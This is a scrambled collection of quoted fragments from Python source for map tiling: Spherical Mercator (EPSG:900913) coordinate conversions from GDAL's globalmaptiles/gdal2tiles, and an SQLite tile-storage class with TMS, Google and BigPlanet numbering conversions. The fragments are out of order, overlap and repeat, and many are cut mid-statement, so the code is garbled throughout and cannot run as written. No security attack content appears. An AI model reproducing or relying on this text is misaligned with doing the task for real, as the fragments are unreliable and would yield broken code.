structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir):", "INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..',", "gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For other GIS programs check", "to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize - pyr res", "not visually noticable. How do I create a raster in EPSG:900913 and convert", "2 bands: 1 grayscale, one alpha mask import sqlite3 import os import math", "TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE", "EPSG:900913 to pyramid pixel coordinates in given zoom level\" res = self.Resolution( zoom", "in WGS84 Datum to XY in Spherical Mercator EPSG:900913\" mx = lon *", "precision of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale", "image from tiles where x=? and y=? and z=?\", (x, y, z)) res", "(\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a", "kilometers, the coordinate origin is in the middle of extent. In fact you", "Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are", "& mask) != 0: digit += 1 if (ty & mask) != 0:", "(x, y, z) in res: xx= x zz= z yy= 2**zz - y", "\"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into", "(x, y, z) in res: xx= x zz= 17 - z yy= 2**zz", "file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z, image) :", "database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null", "as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=? and", "* math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ):", "0 mask = 1 << (i-1) if (tx & mask) != 0: digit", "minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat,", "overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur =", "coordinate origin is in the middle of extent. In fact you can calculate", "* 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given", "(2 * math.atan( math.exp( lat * math.pi / 180.0)) - math.pi / 2.0)", "SqliteTileStorage(): \"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type", "the spherical form of projection, not the ellipsoidal form. Since the projection is", "LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum to XY in", "not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if", "file (-addalpha) in 3857 projection (projection is forced due # to weird effect", "coordinates with PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or", "(x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0,", "return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite", "self.originShift / 180.0 my = math.log( math.tan((90 + lat) * math.pi / 360.0", "resolution is always divided by two initialResolution = 20037508.342789244 * 2 / 256", "of projection, not the ellipsoidal form. Since the projection is used only for", "None or z < self.minzoom: self.minzoom = z if self.maxzoom is None or", "a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs", "return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin of", "for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on", "* 180.0 lat = 180 / math.pi * (2 * math.atan( math.exp( lat", "Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME>", "zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx,", "= self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and z=?\", (x,", "85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then", "PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel coordinates to top-left", "(tx & mask) != 0: digit += 1 if (ty & mask) !=", "2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84", "( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute(", "= False): if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into", "int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS", "cur = self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images)", "scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google", "under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\"", "return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel", "self.minzoom = z if self.maxzoom is None or z > self.maxzoom: self.maxzoom =", "self.db.cursor() cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images =", "Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human", "= self.Resolution( zoom ) px = (mx + self.originShift) / res py =", "(?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write", "= self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for (x,", "= EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic", "TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor()", "z) : \"\"\" read a single tile as string \"\"\" cur = self.db.cursor()", "res - self.originShift my = py * res - self.originShift return mx, my", "180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point from", "given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py", "contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785)", "approximately 0.33 percent scale distortion in the Y direction, which is not visually", "* math.pi / 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self,", "my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in", "# to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha", "top-left corner\" # # mapSize = self.tileSize << zoom # return px, mapSize", "xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx)", "Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs", "zoom py = mapSize - pyr res = self.Resolution( zoom ) mx =", "region is on top of pyramid (zoom=0) covered by 256x256 pixels tile, every", "ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest to the pixelSize.\"", "else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom", "tile name convention? The tile raster itself is the same (equal extent, projection,", "email: klokan at klokan dot cz. I would like to know where it", "ty, zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\" minx, miny", "px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile for given", "py = mapSize - pyr res = self.Resolution( zoom ) mx = px", "the projection is used only for map display, and not for displaying numeric", "XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <-> |", "in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import sqlite3 import", "them on top of base maps of those web mapping applications. Pixel and", "Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for", "EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize - pyr res =", "in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0", "-1): digit = 0 mask = 1 << (i-1) if (tx & mask)", "\"Resolution (meters/pixel) for given zoom level (measured at Equator)\" # return (2 *", "or find it usefull for your project please let me know. My email:", "x=? and y=? and z=?\", (x, y, z)) res = cur.fetchone() if res:", "/ math.pi * (2 * math.atan( math.exp( lat * math.pi / 180.0)) -", "z self.commitData() def commitData(self, force = False): if len(self.pending_images) > 500 or force:", "Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in metres XY", "web clients like Google Maps are projecting those coordinates by Spherical Mercator, so", "minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize,", "there is just different identification of the same raster tile. Tiles in TMS", "official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0", "already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False", "is degined as EPSG:3785. WKT definition is in the official EPSG database. Proj4", "f.read()) def writeImage(self, x, y, z, image) : \"\"\" write a single tile", "Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft", "the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785.", "AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def", "AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize =", "EPSG:900913? whole region is on top of pyramid (zoom=0) covered by 256x256 pixels", "abs(latitude) bigger then 85.05112878 are clipped off. What are zoom level constants (pixels/meter)", "EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m", "corner\" # # mapSize = self.tileSize << zoom # return px, mapSize -", "zoom): \"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels( mx, my,", "AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\"", "Datum\" lon = (mx / self.originShift) * 180.0 lat = (my / self.originShift)", "__init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution =", "/ self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat =", "* 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom", "CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT", "Google Maps/QuadTree tile name convention? The tile raster itself is the same (equal", "coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes", "Code 2008, project GDAL2Tiles for OSGEO. In case you use this class in", "19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no", "Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In case you use", "Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid", "self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat,", "/ float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self, px, py,", "a new storage file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if", "In case you use this class in your product, translate it to another", "zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return (", "* 2 / 256 = 156543.03392804062 What is the difference between TMS and", "p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ =", "cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom =", "x zz= 17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def", "of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as", "of the tools supports -t_srs 'epsg:900913'. For other GIS programs check the exact", "fact you can calculate the constant as: 2 * math.pi * 6378137 /", "[0,0] in the bottom-left corner, id is XYZ. Google placed the origin [0,0]", "+b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format", "if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename):", "= str(res[0]) return image else : print (\"None found\") return None def createFromDirectory(self,", "can calculate the constant as: 2 * math.pi * 6378137 / 2.0 $", "the difference between TMS and Google Maps/QuadTree tile name convention? The tile raster", "EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What are", "+ self.originShift) / res mapSize = self.tileSize << zoom return px, mapSize -", "zoom of the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if", "= 180 / math.pi * (2 * math.atan( math.exp( lat * math.pi /", "* res - self.originShift my = py * res - self.originShift return mx,", "TABLE IF NOT EXISTS tiles ( x int, y int, z int, s", "of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution", "the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize, zoom", "zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of", "my, zoom): \"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels( mx,", "self.maxzoom = None self.written = set() self.db.commit() self.pending_images = [] def open(self, filename)", "float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom):", "-t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What", "y, z) in res: xx= x zz= 17 - z yy= 2**zz -", "ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon,", "alpha mask import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py 19288", "in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.", "is None or z < self.minzoom: self.minzoom = z if self.maxzoom is None", "me know. My email: klokan at klokan dot cz. I would like to", "(self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write a", "1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates", "a new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname,", "= (my + self.originShift) / res mapSize = self.tileSize << zoom return px,", "http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. WKT definition is in the", "/ self.originShift) * 180.0 lat = 180 / math.pi * (2 * math.atan(", "ty for i in range(zoom, 0, -1): digit = 0 mask = 1", "84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0],", "tx = int( math.ceil( px / float(self.tileSize) ) - 1 ) ty =", "treated as if the were on the WGS84 ellipsoid. From MSDN documentation: To", "tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate", "def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to Google Tile coordinates\"", "Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft Virtual", "= sqlite3.connect(self.filename) cur = self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles", "tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth", "+no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google Maps Global Mercator\", GEOGCS[\"WGS 84\",", "= lon * self.originShift / 180.0 my = math.log( math.tan((90 + lat) *", "my ): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84", "1) - ty for i in range(zoom, 0, -1): digit = 0 mask", "res = self.Resolution( zoom ) mx = px * res - self.originShift my", "def TileLatLonBounds(self, tx, ty, zoom ): \"Returns bounds of the given tile in", "mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns", "coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1) -", "z if self.maxzoom is None or z > self.maxzoom: self.maxzoom = z self.commitData()", "p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon,", "print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image)", "def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme", "_ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom)", "write a single tile from string \"\"\" if (x, y, z) in self.written:", "To simplify the calculations, we use the spherical form of projection, not the", "20037508.342789244 comes from the circumference of the Earth in meters, which is 40", "EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. Such tiles are compatible with", "corner of the extent return tx, (2**zoom - 1) - ty def QuadTree(self,", "at Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)", "CREATE TABLE IF NOT EXISTS tiles ( x int, y int, z int,", "using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0],", "/------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate extent of", "digit += 1 if (ty & mask) != 0: digit += 2 quadKey", "2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a", "PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\"", "> self.Resolution(i): if i!=0: return i-1 else: return 0 # We don't want", "_, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat, p1_lon, p2_lat, p2_lon, p3_lat, p3_lon,", "(zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f)", "methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False):", "createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from", "lat = 180 / math.pi * (2 * math.atan( math.exp( lat * math.pi", "6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913", "vrt file (-addalpha) in 3857 projection (projection is forced due # to weird", "displaying numeric coordinates, we don't need the extra precision of an ellipsoidal projection.", "PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc", "def writeImageFile(self, x, y, z, f) : \"\"\" write a single tile from", "True else: return False def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET", "- 1 ) return tx, ty #def PixelsToRaster(self, px, py, zoom): # \"Move", "values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None", "EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles -", "it to another language or find it usefull for your project please let", "18:36:17Z rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no warranty #", "type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite", "target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering", "usefull for your project please let me know. My email: klokan at klokan", "web. It contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913", "Global Map Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions", "mask) != 0: digit += 1 if (ty & mask) != 0: digit", "a single tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self,", "self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY", "my def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913", "an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return", "z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\"", "DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0],", "ellipsoidal form. Since the projection is used only for map display, and not", "PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self,", "Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\" #", "a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "for OpenLayers Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification", "level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize", "# VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME> # input:", "overwrite=False) : \"\"\" Create a new sqlite file from a z/y/x.ext directory structure\"\"\"", "360.0 )) / (math.pi / 180.0) my = my * self.originShift / 180.0", "tx, ty, zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\" minx,", "$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with", "return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None", "info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom", "in fact lat/lon coordinates on sphere are treated as if the were on", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global", "ellipsoid. From MSDN documentation: To simplify the calculations, we use the spherical form", "name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum,", "weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import", "int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE", "p2_lon, p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given", "minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon,", "px = (mx + self.originShift) / res py = (my + self.originShift) /", "used. Class is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL =", "sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written", "not for displaying numeric coordinates, we don't need the extra precision of an", "on top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom", "OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "= (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z,", "basedir, overwrite=False) : \"\"\" Create a new sqlite file from a z/y/x.ext directory", "in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0])", "Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK", "* 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2", "image else : print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False)", "# From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED FROM", "in the middle of extent. In fact you can calculate the constant as:", "84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]]", "y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image)))", "for (x, y, z) in res: xx= x zz= z yy= 2**zz -", "minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y,", "the ellipsoidal form. Since the projection is used only for map display, and", "for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print", ") def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx,", "to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1) - ty", "/----/ <-> Google \\ / | | /--------/ QuadTree ----- --------- /------------/ KML,", "py / float(self.tileSize) ) - 1 ) return tx, ty #def PixelsToRaster(self, px,", "Mercator, so in fact lat/lon coordinates on sphere are treated as if the", "is forced due # to weird effect in AutoCreateWarpedVRT) # 2 bands: 1", "): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\" # return (2", "tile from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y,", "What coordinate conversions do we need for TMS Global Mercator tiles:: LatLon <->", "z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # =============================================================================", "- GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo Maps, Microsoft", "180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger", "every lower zoom level resolution is always divided by two initialResolution = 20037508.342789244", "return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point from Spherical", "/ 2.0) return lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates", "tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for", "- z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False):", "self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1, zoom) return (p1_lat,", "y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\"", "the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244", "storage\"\"\" def __init__(self, type): self.type=type def create(self, filename, overwrite=False): \"\"\" Create a new", "============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in 